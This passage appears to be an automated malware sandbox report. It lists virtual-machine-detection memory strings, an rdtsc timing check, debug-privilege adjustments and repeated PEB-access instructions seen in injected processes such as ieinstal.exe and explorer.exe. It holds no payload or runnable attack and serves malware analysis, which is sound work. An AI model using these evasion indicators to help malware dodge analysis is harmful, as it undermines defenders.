      Source: explorer.exe, 00000008.00000000.25700975836.0000000010EDF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WGHFYPRJPNJUKSYQVDCDFZEEZLSYFNQOKCJRMASCJPYPWDPGJXUCDHEZMPLPVMCIBRIQ
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: wscript.exe, 0000000A.00000002.28754036914.0000000006D4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: ieinstal.exe, 00000007.00000003.25330691425.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24876167840.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25341929794.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25340415198.0000000002C89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.24988601363.0000000010A1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25155656867.00000000109F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25156592146.0000000010A1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25691754934.0000000010A1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25691071870.00000000109F7000.00000004.00000001.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28724077789.0000000000505000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000008.00000000.25700975836.0000000010EDF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: YPRJPNJUKSYQVDCDFZEEZLSYFNQOKCJRMASCJPYPWDPGJXUCDHEZMPLPVMCIBRIQ
      Source: explorer.exe, 00000008.00000000.24901060532.0000000003350000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25614906480.0000000003350000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25052000484.0000000003350000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.25225738031.0000000003350000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: firefox.exe, 0000000F.00000002.25914573207.000002AFB45DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CCE40 rdtsc 7_2_1E6CCE40
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64BE60 mov eax, dword ptr fs:[00000030h]7_2_1E64BE60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64BE60 mov eax, dword ptr fs:[00000030h]7_2_1E64BE60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70EE78 mov eax, dword ptr fs:[00000030h]7_2_1E70EE78
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724E62 mov eax, dword ptr fs:[00000030h]7_2_1E724E62
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E651E70 mov eax, dword ptr fs:[00000030h]7_2_1E651E70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68CE70 mov eax, dword ptr fs:[00000030h]7_2_1E68CE70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E687E71 mov eax, dword ptr fs:[00000030h]7_2_1E687E71
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E700E6D mov eax, dword ptr fs:[00000030h]7_2_1E700E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64DE45 mov eax, dword ptr fs:[00000030h]7_2_1E64DE45
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64DE45 mov ecx, dword ptr fs:[00000030h]7_2_1E64DE45
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64FE40 mov eax, dword ptr fs:[00000030h]7_2_1E64FE40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64AE40 mov eax, dword ptr fs:[00000030h]7_2_1E64AE40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64AE40 mov eax, dword ptr fs:[00000030h]7_2_1E64AE40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64AE40 mov eax, dword ptr fs:[00000030h]7_2_1E64AE40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67EE48 mov eax, dword ptr fs:[00000030h]7_2_1E67EE48
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CDE50 mov eax, dword ptr fs:[00000030h]7_2_1E6CDE50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CDE50 mov eax, dword ptr fs:[00000030h]7_2_1E6CDE50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CDE50 mov ecx, dword ptr fs:[00000030h]7_2_1E6CDE50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CDE50 mov eax, dword ptr fs:[00000030h]7_2_1E6CDE50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CDE50 mov eax, dword ptr fs:[00000030h]7_2_1E6CDE50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E652E32 mov eax, dword ptr fs:[00000030h]7_2_1E652E32
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E718E26 mov eax, dword ptr fs:[00000030h]7_2_1E718E26
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E718E26 mov eax, dword ptr fs:[00000030h]7_2_1E718E26
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E718E26 mov eax, dword ptr fs:[00000030h]7_2_1E718E26
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E718E26 mov eax, dword ptr fs:[00000030h]7_2_1E718E26
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68CE3F mov eax, dword ptr fs:[00000030h]7_2_1E68CE3F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E6E30 mov eax, dword ptr fs:[00000030h]7_2_1E6E6E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E6E30 mov eax, dword ptr fs:[00000030h]7_2_1E6E6E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E5E30 mov eax, dword ptr fs:[00000030h]7_2_1E6E5E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E5E30 mov ecx, dword ptr fs:[00000030h]7_2_1E6E5E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E5E30 mov eax, dword ptr fs:[00000030h]7_2_1E6E5E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E5E30 mov eax, dword ptr fs:[00000030h]7_2_1E6E5E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E5E30 mov eax, dword ptr fs:[00000030h]7_2_1E6E5E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6E5E30 mov eax, dword ptr fs:[00000030h]7_2_1E6E5E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653E01 mov eax, dword ptr fs:[00000030h]7_2_1E653E01
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656E00 mov eax, dword ptr fs:[00000030h]7_2_1E656E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656E00 mov eax, dword ptr fs:[00000030h]7_2_1E656E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656E00 mov eax, dword ptr fs:[00000030h]7_2_1E656E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E656E00 mov eax, dword ptr fs:[00000030h]7_2_1E656E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653E14 mov eax, dword ptr fs:[00000030h]7_2_1E653E14
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653E14 mov eax, dword ptr fs:[00000030h]7_2_1E653E14
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653E14 mov eax, dword ptr fs:[00000030h]7_2_1E653E14
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724E03 mov eax, dword ptr fs:[00000030h]7_2_1E724E03
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFE1F mov eax, dword ptr fs:[00000030h]7_2_1E6CFE1F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFE1F mov eax, dword ptr fs:[00000030h]7_2_1E6CFE1F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFE1F mov eax, dword ptr fs:[00000030h]7_2_1E6CFE1F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFE1F mov eax, dword ptr fs:[00000030h]7_2_1E6CFE1F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64BE18 mov ecx, dword ptr fs:[00000030h]7_2_1E64BE18
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E688E15 mov eax, dword ptr fs:[00000030h]7_2_1E688E15
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E681EED mov eax, dword ptr fs:[00000030h]7_2_1E681EED
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E681EED mov eax, dword ptr fs:[00000030h]7_2_1E681EED
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E681EED mov eax, dword ptr fs:[00000030h]7_2_1E681EED
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E653EE2 mov eax, dword ptr fs:[00000030h]7_2_1E653EE2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E652EE8 mov eax, dword ptr fs:[00000030h]7_2_1E652EE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E652EE8 mov eax, dword ptr fs:[00000030h]7_2_1E652EE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E652EE8 mov eax, dword ptr fs:[00000030h]7_2_1E652EE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E652EE8 mov eax, dword ptr fs:[00000030h]7_2_1E652EE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F3EFC mov eax, dword ptr fs:[00000030h]7_2_1E6F3EFC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CEF0 mov eax, dword ptr fs:[00000030h]7_2_1E64CEF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CEF0 mov eax, dword ptr fs:[00000030h]7_2_1E64CEF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CEF0 mov eax, dword ptr fs:[00000030h]7_2_1E64CEF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CEF0 mov eax, dword ptr fs:[00000030h]7_2_1E64CEF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CEF0 mov eax, dword ptr fs:[00000030h]7_2_1E64CEF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64CEF0 mov eax, dword ptr fs:[00000030h]7_2_1E64CEF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70EEE7 mov eax, dword ptr fs:[00000030h]7_2_1E70EEE7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E719ED2 mov eax, dword ptr fs:[00000030h]7_2_1E719ED2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E691ED8 mov eax, dword ptr fs:[00000030h]7_2_1E691ED8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724EC1 mov eax, dword ptr fs:[00000030h]7_2_1E724EC1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BED0 mov eax, dword ptr fs:[00000030h]7_2_1E68BED0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68CEA0 mov eax, dword ptr fs:[00000030h]7_2_1E68CEA0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682EB8 mov eax, dword ptr fs:[00000030h]7_2_1E682EB8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E682EB8 mov eax, dword ptr fs:[00000030h]7_2_1E682EB8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov eax, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov eax, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov eax, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov ecx, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E661EB2 mov eax, dword ptr fs:[00000030h]7_2_1E661EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E710EAD mov eax, dword ptr fs:[00000030h]7_2_1E710EAD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E710EAD mov eax, dword ptr fs:[00000030h]7_2_1E710EAD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67BE80 mov eax, dword ptr fs:[00000030h]7_2_1E67BE80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AE89 mov eax, dword ptr fs:[00000030h]7_2_1E67AE89
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AE89 mov eax, dword ptr fs:[00000030h]7_2_1E67AE89
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724F7C mov eax, dword ptr fs:[00000030h]7_2_1E724F7C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64BF70 mov eax, dword ptr fs:[00000030h]7_2_1E64BF70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E651F70 mov eax, dword ptr fs:[00000030h]7_2_1E651F70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67AF72 mov eax, dword ptr fs:[00000030h]7_2_1E67AF72
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70EF66 mov eax, dword ptr fs:[00000030h]7_2_1E70EF66
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6A6F70 mov eax, dword ptr fs:[00000030h]7_2_1E6A6F70
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64EF79 mov eax, dword ptr fs:[00000030h]7_2_1E64EF79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64EF79 mov eax, dword ptr fs:[00000030h]7_2_1E64EF79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64EF79 mov eax, dword ptr fs:[00000030h]7_2_1E64EF79
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70AF50 mov ecx, dword ptr fs:[00000030h]7_2_1E70AF50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70BF4D mov eax, dword ptr fs:[00000030h]7_2_1E70BF4D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DF36 mov eax, dword ptr fs:[00000030h]7_2_1E66DF36
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DF36 mov eax, dword ptr fs:[00000030h]7_2_1E66DF36
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DF36 mov eax, dword ptr fs:[00000030h]7_2_1E66DF36
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66DF36 mov eax, dword ptr fs:[00000030h]7_2_1E66DF36
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D8F3C mov eax, dword ptr fs:[00000030h]7_2_1E6D8F3C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D8F3C mov eax, dword ptr fs:[00000030h]7_2_1E6D8F3C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D8F3C mov ecx, dword ptr fs:[00000030h]7_2_1E6D8F3C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D8F3C mov ecx, dword ptr fs:[00000030h]7_2_1E6D8F3C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64FF30 mov edi, dword ptr fs:[00000030h]7_2_1E64FF30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BF0C mov eax, dword ptr fs:[00000030h]7_2_1E68BF0C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BF0C mov eax, dword ptr fs:[00000030h]7_2_1E68BF0C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68BF0C mov eax, dword ptr fs:[00000030h]7_2_1E68BF0C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66CF00 mov eax, dword ptr fs:[00000030h]7_2_1E66CF00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66CF00 mov eax, dword ptr fs:[00000030h]7_2_1E66CF00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFF03 mov eax, dword ptr fs:[00000030h]7_2_1E6CFF03
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFF03 mov eax, dword ptr fs:[00000030h]7_2_1E6CFF03
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CFF03 mov eax, dword ptr fs:[00000030h]7_2_1E6CFF03
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724F1D mov eax, dword ptr fs:[00000030h]7_2_1E724F1D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E690F16 mov eax, dword ptr fs:[00000030h]7_2_1E690F16
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E690F16 mov eax, dword ptr fs:[00000030h]7_2_1E690F16
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E690F16 mov eax, dword ptr fs:[00000030h]7_2_1E690F16
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E690F16 mov eax, dword ptr fs:[00000030h]7_2_1E690F16
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov ecx, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov ecx, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov ecx, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov ecx, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE0 mov eax, dword ptr fs:[00000030h]7_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E724FFF mov eax, dword ptr fs:[00000030h]7_2_1E724FFF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E678FFB mov eax, dword ptr fs:[00000030h]7_2_1E678FFB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70EFD3 mov eax, dword ptr fs:[00000030h]7_2_1E70EFD3
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64BFC0 mov eax, dword ptr fs:[00000030h]7_2_1E64BFC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D1FC9 mov eax, dword ptr fs:[00000030h]7_2_1E6D1FC9
